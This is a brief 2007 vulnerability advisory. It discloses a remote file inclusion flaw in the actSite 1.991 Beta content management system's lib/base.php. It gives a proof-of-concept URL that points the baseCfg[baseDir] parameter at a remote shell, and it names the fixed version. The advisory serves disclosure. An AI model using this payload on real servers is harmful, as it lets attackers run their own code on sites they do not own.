:: #'#/
(-.-)
---------------------oOO---(_)---OOo--------------------
| actSite v1.991 Beta (
base.php) Remote File Inclusion |
| coded by DNX |
--------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: http://www.actsite.de
[!] Detected: 02.09.2007
[!] Reported: 02.09.2007
[!] Remote: yes
[!] Background: actSite is a content management system
based on PHP and MySQL
[!] Bug: $
baseCfg[
baseDir] in lib/
base.php
[!] PoC:
- http://[site]/[path]/lib/
base.php?
baseCfg[
baseDir]=[shell]
[!] Solution: Install update to v1.995 ::